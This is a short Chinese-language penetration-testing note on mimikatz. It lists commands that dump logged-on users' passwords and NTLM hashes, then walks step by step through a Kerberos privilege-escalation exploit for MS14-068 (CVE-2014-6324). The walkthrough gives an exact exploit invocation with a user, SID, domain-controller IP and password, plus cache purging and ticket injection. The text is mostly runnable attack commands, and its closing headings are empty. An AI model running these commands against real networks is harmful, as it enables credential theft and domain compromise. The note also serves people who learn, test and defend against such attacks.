mimikatz的使用
简介:
mimikatz,很多人称之为密码抓取神器,但在内网渗透中,远不止这么简单
测试过程:
常见命令:
cls-----------------------------清屏
exit----------------------------退出
version------------查看mimikatz的版本
system::user-----查看当前登录的系统用户
system::computer-------查看计算机名称
process::list------------------列出进程
process::suspend 进程名称 -----暂停进程
process::stop 进程名称---------结束进程
process::modules --列出系统的核心模块及所在位置
service::list---------------列出系统的服务
service::remove-----------移除系统的服务
service::start stop 服务名称--启动或停止服务
privilege::list---------------列出权限列表
privilege::enable--------激活一个或多个权限
privilege::debug-----------------提升权限
nogpo::cmd------------打开系统的cmd.exe
nogpo::regedit -----------打开系统的注册表
nogpo::taskmgr-------------打开任务管理器
ts::sessions-----------------显示当前的会话
ts::processes------显示进程和对应的pid情况等
sekurlsa::wdigest-----获取本地用户信息及密码
sekurlsa::tspkg------获取tspkg用户信息及密码
sekurlsa::msv 抓取hash
sekurlsa::logonPasswords--获登陆用户信息及密码
sekurlsa::ekeys 抓取hash
获取本机信息:
mimikatz:
privilege::debug
sekurlsa::logonpasswords
MS14-068提权:
MS14-068
编号CVE-2014-6324
,补丁为3011780
我的域控是win2012 R2,没有利用成功,但是win2008 R2是可以的
后来查了下,貌似影响版本从win2000-win2012(不包括win2012)
使用MS14-068.exe
MS14-068.exe -u test@test.com -s S-1-5-21-1528753600-3951244198-520479113-1107 -d 192.168.93.10 -p 123!@#qwe #其中-s 用whoami /all查看 输入的是域用户的账号密码,同时注意不能忽略掉sid后面几位,和黄金票据不太一样
klist purge #删除所有缓存票据,如果不清除,在域用户下就不能利用成功,只能在本地用户下利用成功
kerberos::purge
kerberos::list
kerberos::ptc TGT_test@test.org.ccache #注意不是kerberos::ptt
抓取hash值:
获登陆用户信息及密码:
显示当前的会话: